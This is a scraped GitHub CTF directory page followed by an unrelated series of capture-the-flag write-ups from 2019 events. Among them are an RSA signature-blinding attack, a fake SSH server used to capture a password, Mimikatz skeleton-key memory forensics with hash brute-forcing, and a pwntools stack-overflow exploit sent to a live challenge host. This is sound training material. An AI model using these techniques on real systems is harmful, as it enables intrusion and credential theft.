<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":102334842,"originating_url":"https://github.com/AnisBoss/CTFs/tree/master/Securinets-CTF-QUALS-2019/special_revenge","user_id":null}}" data-hydro-click-hmac="1e6939c4e6b83e7531422cfe5331d080a13cc61f0557b835cb667f014e6216d0"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/AnisBoss/CTFs/refs" cache-key="v0:1504513197.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="QW5pc0Jvc3MvQ1RGcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/AnisBoss/CTFs/refs" cache-key="v0:1504513197.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="QW5pc0Jvc3MvQ1RGcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>CTFs</span></span></span><span>/</span><span><span>Securinets-CTF-QUALS-2019</span></span><span>/</span>special_revenge<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>CTFs</span></span></span><span>/</span><span><span>Securinets-CTF-QUALS-2019</span></span><span>/</span>special_revenge<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/AnisBoss/CTFs/tree-commit/535e1e5b04425e859058e8ef9450f4d76580728f/Securinets-CTF-QUALS-2019/special_revenge" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/AnisBoss/CTFs/file-list/master/Securinets-CTF-QUALS-2019/special_revenge"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>mystery.sh</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>solver.sh</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
RSA blinding attack* possibility to execute commands on the server* commands must be signed before being executed* required command 'cat flag' cannot be signed because of blacklisted 'cat' command* adjust command 'cat flag' with blinding factor* sign adjusted command* calculate signature for original command 'cat flag'* execute command with valid signature |
Nice crypto challenge, with for once a stream cipher using an LFSR.
The base idea was to use the Berkelamp-Massey algorithm to bruteforce bit by bit where the flag could be in flag.html, given that at least `VolgaCTF{` had to be there. I struggled a bit with converting the strings to bits as it was a bit unusual and I had to find a BMA implementation that worked, which took a while (note to future self: implement it yourself!), but in the end after some struggling here was the flag!
`VolgaCTF{It_h45_alr3ady_b3c0m3_a_cl4ssic}`
You will find the script [here](https://github.com/arty-hlr/CTF-writeups/tree/master/2019/volga/shifter). |
# VolgaCTF 2019 Qualifier - JOI - Stego - 150## ChallAll we have is just one image
result.png
## SolveWe just have to open stegsolve and change plans until qrcode return the flag to us.The right plan is red plane 0
**VolgaCTF{5t3g0_m4tr3shk4_in_4cti0n}** |
This crypto challenge was based on the multiplicative property of RSA, basically if you want to encrypt something that can be factored, encrypting the factors and multiplying them (mod n) is the same as encrypting that something (at least with unpadded RSA). That was all we had to do there, convert `cat flag` to an integer with base64 encoding, then factor it, and have the server sign each factor. The only problem that arose is that in one of the factors of `cat flag`, there was a lone single quote, and the server didn't like it, so instead of having the server sign each of the three factors, we had to multiply to of them.
`VolgaCTF{B1ind_y0ur_tru3_int3nti0n5}`
You will find the script [here](https://github.com/arty-hlr/CTF-writeups/blob/master/2019/volga/blind/README.md). |
# Knockknock
It was not about attacking, but listening on the laptop.There was a connection to port 22 from the server 10.13.37.99Let's install a FakeSSH serveur :git clone https://github.com/tylermenezes/FakeSSH
sudo pip install paramiko
cd FakeSSHcp ./data/config.sample.json ./data/config.jsonssh-keygen -f ./data/rsa -m 'PEM' set no password
sudo python3 server.py
wait max 10min
ssh -l svc-tenable-linux 10.13.37.99password = $\mx3i#u0@%6d@8fk^&^x*ntw2m
# Net1
it is supposed to happen between port TCP3000-4000a quick : nmap -Pn -p 3000-4000 10.13.37.99
Hint 2 : RFC741x => RFC7413 = Use TCP SYN Data
ok, Let's try some Python Scapy with TCP-Syn Data
Trying to send some commands but nothing back from the server.
Hint : We got the password "SyN" at 1am
Ok, let's send some commandsmain(SyN ls -la)....final command : main(SyN cat ./secret/me/not/flag.txt)
to find flag 
# mybrokenbash
nc server 1337 Let's send the command **cat flag** but we get cat flag in return ok so maybe stdout is closed but **cat flag 2>&1** doesn't work either so maybe stderr is also closed let's redirect stdout to stdin **cat flag 1>&0** We are on the good track but we are missing something still. The file had a carriage return (\r), and only the end of the file was sent back One had to find/know that cat has options. ** cat -A** = show-allFinal command to show the flag was ** cat -A flag 1>&0**
# Skeleton in the closet
https://download.scrt.ch/insomnihack2019/SiC_8b47589556efae17471bbb768e25b525.zip
After searching a bit, we found the reference of the Skeleton Misc function of the well known Mimikatz of Benjamin Delpy.https://github.com/gentilkiwi/mimikatz We find from the documentation, this function will somehow patch the LSASS process and adds a super password which will work for any username used ! By default, the password is : **mimikatz** The NTLM hash of mimikatz is : 
We can see from the source code of mimikatz this NTML password in little endian format.
The definition of the chall, is that a personalized version of mimikatz has been used. So we need to find the password which has been encoded in his customized version.
We download the memory dump file and analyse it with Volatility.
**python vol.py -f memory.vmem imageinfo.** To find the OS. 
**python vol.py -f memory.vmem --profile=Win2016x64_14393 pslist.** To find the process running. 
**python vol.py -f memory.vmem --profile=Win2016x64_14393 -p 588 memdump -D ./dump.**
Now we need to find how this alteration of this skeleton function has left traces in the memory. To find this, we use a standard Domain Controller and apply the function with the original version of Mimikatz. **mimikatz** **privilege::debug** **misc::skeleton**
After dumping the memory of the lsass process, let's analyse how the original mimikatz has writen the NTLM hash in the memory. We can use many tools, but here we use **hexedit lsass_post.DMP** And search for out hash starting with **60ba4f** (Ctrl-S)We can see the NTLM hash with a structure around it **C7 44 24 xx** between each part. (In blue the hash, orange the repeated pattern). 
Great, let's do the same on the dumped memory from Volatility and search for this pattern **C7 44 24**
The NTLM hash to crack is 65FB3480 14C7B62A 100AF97E EC0B6221 And we know from the chall definition that it is **INS{xxxxxxx}** (7 chars to find)
Let's bruteforce the hash: John:**john --format=nt -mask=INS{?1?1?1?1?1?1?1} -1=?l?u?d ./myhash.txt** Hashcat: **hashcat64 --session skeleton hash.txt -m 1000 -a 3 INS{?1?1?1?1?1?1?1} -1 ?l?u?d**
|
## Return To Mania (Pwn, 50 pts)
#### Challenge Description
To celebrate her new return to wrestling, Captn Overflow authored this challenge to enter the ring
```nc ret.sunshinectf.org 4301```
Author: bambu
#### Overview
The challenge provides a download to a binary. The binary is an x86 (ELF32), and symbols haven't been stripped. The main function calls another function called `welcome()`, which essentially does the following:
```c// pseudocodevoid welcome(){ char key[18]; printf("Welcome to WrestleMania! Type in key to get access.\n"); printf("addr of welcome(): %p\n", (void *)welcome); scanf("%s", &key);}```
The issue here is fairly obvious in that there's no bounds checking on the input string, so a stack overflow is possible if you provide more than 18 characters. Running `checksec` on the binary reveals that the binary has NX and PIE enabled, therefore the addresses will be randomized. This can also be seen if you connect to the hostname and port above, you'll notice the address of `welcome()` is different every run.
Looking around the binary a bit more will reveal there's a win function called `mania()` that'll open a flag file to give us the flag.
#### Calculating the Win Function Address
Since ASLR is enabled and the binary is position independent (PIE), we'll need to calculate the address of the win function. We can do this using the pointer to `welcome()` that is provided to us. In the binary, the following functions have the following offsets:
```welcome(): 0x6EDmania(): 0x65D```
This means that we can calculate the virtual address of `mania()` by taking the pointer provided for `welcome()` and subtracting 0x90.
#### Stack Smashing
Using the stack overflow we can overwrite the return address of `welcome()`. Since the buffer for the key is 18 bytes, and 4 bytes are needed for saving the base pointer, the address overwrite will happen after 22 bytes of input.
```AAAAAAAAAAAAAAAAAAAAAA + [address of mania()]```
#### Flag Script
I used pwntools to handle the remote connection stuff and to also get some helper functions such as `p32()` to write a 32-bit pointer to the payload.
```pythonfrom pwn import *context(arch='i386', os='linux')
r = remote('ret.sunshinectf.org', 4301)
# Receive trashr.recvuntil(': ')
# Receive the line containing the address for ASLR defeataddressLine = r.recvline()addressOfWin = int(addressLine, 16) - 0x90
print("[+] Win function: 0x" + format(addressOfWin, '02x'))
# Construct payloadpayload = "A"*22payload += p32(addressOfWin)
# Bombs away!r.send(payload)r.send("\x0A")
r.recvline()
print("[+] Found flag: " + r.recvline())```
After running this script, we'll get the flag.
```[+] Opening connection to ret.sunshinectf.org on port 4301: Done[+] Win function: 0x565bd65d[+] Found flag: sun{0V3rfl0w_rUn_w!Ld_br0th3r}
[*] Closed connection to ret.sunshinectf.org port 4301 ```
Flag:
```sun{0V3rfl0w_rUn_w!Ld_br0th3r}```
|
# Treasure
## Problem
[file](./src/treasure)
## Solution
Let's see what's inside the file:
It might be a bit unclear, but all this text is just a base64. So we can decode this and get a new file.
Looking into the new file didn't give me any hints about what is is, so I passed it to `binwalk`.
Ha, it's a game for GameBoy. I've download emulator and ran this.
The tasks says that passcode is under the flag, so it's 58DPY. Wrap it in flag format and here it is: b00t2root{58DPY} |
It's easy but it took time to find the correct coordinates
```python#!/usr/bin/python2
import requests, refrom PIL import Image, ImageDraw
def parse(html): l = re.findall(r'([^<]+)', html) ans = [] for i in xrange(0, len(l), 5): options = map(int, l[i+1:i+5]) print "%s - [%s]" % (l[i], ', '.join(l[i+1:i+5])) val = eval(l[i]) ans.append(options.index(val)) return ans
def solve(ans): x, y, r = 362, 460, 24 img = Image.open("scantron.png") d = ImageDraw.Draw(img) for i in xrange(len(ans)): sol = ans[i] a = x+68*sol+(i/10)*(220+68*4) b = y + 90*(i % 10) d.ellipse([a-r, b-r, a+r, b+r], fill='black') img.save(open("solution.png", "wb"), "png")
s = requests.Session()url = "http://ee.sunshinectf.org/exam"resp = s.get(url)count = 1while True: t = resp.text if t[:4] != '<h1>': print t break print "Section", count count += 1 ans = parse(t) solve(ans) resp = s.post(url, files={ 'file': open('solution.png', 'rb') })s.close()``` |
# GENETICS (300)
## Category: Crypto
## Difficulty: Easy(:P)
### Writeup :
This CTF was quite an interesting one. This was the first challenge that I solved(1st Blood :P). So to start with a Sequence of characters conataining A,C,G & T was given. So if u know Biology then u know it was a DNA Sequence. > ACCAGTAAAACGTTGAGACAGTTGAATATCAAACTACACCGAATTCATATGTCACAGCGGCCGACACAGATGATAACA Thanks to John_Hammond for this Gr8 Katana (https://github.com/JohnHammond/ctf-katana).
Then Decoding it manually gave me the flag.
> b00t2root{dnaCrypto1sAwesome} |
